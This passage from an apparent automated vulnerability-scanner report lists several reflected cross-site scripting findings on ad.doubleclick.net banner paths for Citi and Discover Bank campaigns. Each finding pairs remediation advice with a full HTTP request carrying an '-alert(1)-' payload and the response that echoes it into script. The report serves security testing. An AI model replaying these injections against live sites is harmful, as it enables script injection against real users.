Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1950
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:21:49 GMT
Expires: Tue, 28 Jun 2011 02:21:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=df183'-alert(1)-'09e6c884d7fhttp://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4078877" target="_blank">
...[SNIP]...

1.60. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b56'-alert(1)-'2689d224978 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec66b56'-alert(1)-'2689d224978&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:16:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
t/click%3Bh%3Dv8/3b34/f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec66b56'-alert(1)-'2689d224978&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3768533" target="_blank"
...[SNIP]...

1.61. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15154'-alert(1)-'d86740d32ed was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:38 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var target = '_blank';
var dcbgcolor = ''
...[SNIP]...

1.62. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ba80'-alert(1)-'b278081406c was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:30:06 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blank';
var dcb
...[SNIP]...

1.63. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df45'-alert(1)-'3a47738f921 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:29:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blan
...[SNIP]...

1.64. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf8f'-alert(1)-'f8a532e7701 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:19 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
://s0.2mdn.net/2279893/build_osa_300x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target =
...[SNIP]...

1.65. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590be'-alert(1)-'10e500e253b was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:28 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
93/DBVault_300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var target = '_blank';
var dcb
...[SNIP]...

1.66. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22438'-alert(1)-'30165b56046 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

